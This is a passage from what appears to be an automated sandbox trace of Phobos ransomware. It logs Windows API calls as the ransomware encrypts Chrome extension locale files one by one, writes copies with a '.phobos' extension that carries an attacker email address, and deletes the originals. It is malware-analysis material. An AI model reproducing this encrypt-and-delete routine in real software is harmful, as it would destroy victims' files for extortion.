returned 1 [0156.189] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0156.189] CryptDestroyKey (hKey=0xa32c68) returned 1 [0156.189] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0156.189] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0156.189] CloseHandle (hObject=0x134) returned 1 [0156.189] CloseHandle (hObject=0x130) returned 1 [0156.189] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\manifest.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\manifest.json")) returned 1 [0156.190] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0156.190] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ca\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ca\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0156.190] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=705) returned 1 [0156.190] CloseHandle (hObject=0x130) returned 1 [0156.190] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ca\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ca\\messages.json")) returned 0x2020 [0156.190] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ca\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ca\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0156.190] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ca\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ca\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0156.191] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0156.191] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0156.191] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ca\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ca\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0156.191] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32ce8) returned 1 [0156.191] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0156.191] ReadFile (in: hFile=0x130, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x2c1, lpOverlapped=0x0) returned 1 [0156.339] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x2d0, dwBufLen=0x2d0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x2d0) returned 1 [0156.339] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x2d0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x2d0, lpOverlapped=0x0) returned 1 [0156.905] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32da8) returned 1 [0156.905] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0156.905] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0156.905] CryptDestroyKey (hKey=0xa32da8) returned 1 [0156.905] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0156.905] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0156.905] CloseHandle (hObject=0x130) returned 1 [0156.905] CloseHandle (hObject=0x134) returned 1 [0156.905] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ca\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ca\\messages.json")) returned 1 [0156.906] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0156.906] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\el\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\el\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0156.906] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=875) returned 1 [0156.906] CloseHandle (hObject=0x134) returned 1 [0156.907] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\el\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\el\\messages.json")) returned 0x2020 [0156.907] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\el\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\el\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0156.907] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\el\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\el\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0156.907] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0156.907] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0156.907] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\el\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\el\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0156.907] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32ce8) returned 1 [0156.907] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0156.907] ReadFile (in: hFile=0x134, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x36b, lpOverlapped=0x0) returned 1 [0157.015] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x370, dwBufLen=0x370 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x370) returned 1 [0157.015] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x370, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x370, lpOverlapped=0x0) returned 1 [0157.016] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32aa8) returned 1 [0157.016] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0157.016] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0157.016] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0157.016] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0157.016] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0157.016] CloseHandle (hObject=0x134) returned 1 [0157.017] CloseHandle (hObject=0x130) returned 1 [0157.017] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\el\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\el\\messages.json")) returned 1 [0157.028] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0157.028] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en_GB\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en_gb\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0157.028] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=617) returned 1 [0157.028] CloseHandle (hObject=0x130) returned 1 [0157.028] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en_GB\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en_gb\\messages.json")) returned 0x2020 [0157.028] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en_GB\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en_gb\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0157.028] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en_GB\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en_gb\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0157.029] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0157.029] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0157.029] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en_GB\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en_gb\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0157.029] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32ce8) returned 1 [0157.029] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0157.029] ReadFile (in: hFile=0x130, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x269, lpOverlapped=0x0) returned 1 [0157.169] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x270, dwBufLen=0x270 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x270) returned 1 [0157.169] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x270, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x270, lpOverlapped=0x0) returned 1 [0157.172] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32ca8) returned 1 [0157.172] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0157.172] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0157.172] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0157.172] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0157.172] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0157.172] CloseHandle (hObject=0x130) returned 1 [0157.172] CloseHandle (hObject=0x134) returned 1 [0157.172] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en_GB\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en_gb\\messages.json")) returned 1 [0157.173] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0157.173] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es_419\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es_419\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0157.173] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=667) returned 1 [0157.173] CloseHandle (hObject=0x134) returned 1 [0157.174] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es_419\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es_419\\messages.json")) returned 0x2020 [0157.174] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es_419\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es_419\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0157.174] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es_419\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es_419\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0157.174] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0157.174] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0157.174] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es_419\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es_419\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0157.174] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32ce8) returned 1 [0157.174] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0157.174] ReadFile (in: hFile=0x134, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x29b, lpOverlapped=0x0) returned 1 [0157.303] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x2a0, dwBufLen=0x2a0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x2a0) returned 1 [0157.303] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x2a0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x2a0, lpOverlapped=0x0) returned 1 [0157.304] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32ca8) returned 1 [0157.304] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0157.304] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0157.304] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0157.304] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0157.304] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0157.304] CloseHandle (hObject=0x134) returned 1 [0157.304] CloseHandle (hObject=0x130) returned 1 [0157.305] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es_419\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es_419\\messages.json")) returned 1 [0157.305] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0157.305] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fi\\messages.json"), dwDesiredAccess=0x80000000, 